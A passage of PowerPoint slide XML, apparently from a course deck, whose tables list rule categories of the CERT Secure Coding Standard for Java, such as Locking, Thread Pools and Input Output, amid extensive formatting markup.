                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Numeric Types and Operations (NUM) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>04.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Characters and Strings (STR)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>05.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Object Orientation (OBJ) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>06.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Methods (MET) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="413350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>07.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exceptional Behavior (ERR)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="388200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>08.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike"/>
                        <a:t>Visibility and Atomicity (VNA)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="363050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>09.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike"/>
                        <a:t>Locking (LCK)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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35" name="Shape 435"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>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The CERT Secure Coding Standard for Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1559495" y="1265709"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{A2717AC8-1ECA-4A94-8ABF-F172AB3327F9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="829950"/>
                <a:gridCol w="9295550"/>
              </a:tblGrid>
              <a:tr h="566275">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Trebuchet MS"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="3200"/>
                        <a:t>CERT Secure Coding Standard for Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">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gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:srgbClr val="000000"/>
                        </a:gs>
                        <a:gs pos="39999">
                          <a:srgbClr val="0A128C"/>
                        </a:gs>
                        <a:gs pos="70000">
                          <a:srgbClr val="181CC7"/>
                        </a:gs>
                        <a:gs pos="88000">
                          <a:srgbClr val="7005D4"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="8C3D91"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="0"/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1"/>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>10.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Thread APIs (THI) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>11.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Thread Pools (TPS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>12.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Trebuchet MS"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike"/>
                        <a:t>Thread-Safety Miscellaneous (TSM)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:ea typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                          <a:sym typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>13.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>Input Output (FIO)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="9525" marB="0" marR="9525" marL="9525" anchor="ctr">
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="447075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="zh-TW" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="0E598C"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS"/>
                          <a:ea typeface="Trebuchet MS"/>
                          <a:cs typeface="Trebuchet MS"/>
                          <a:sym typeface="Trebuchet MS"/>
                        </a:rPr>
                        <a:t>14.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
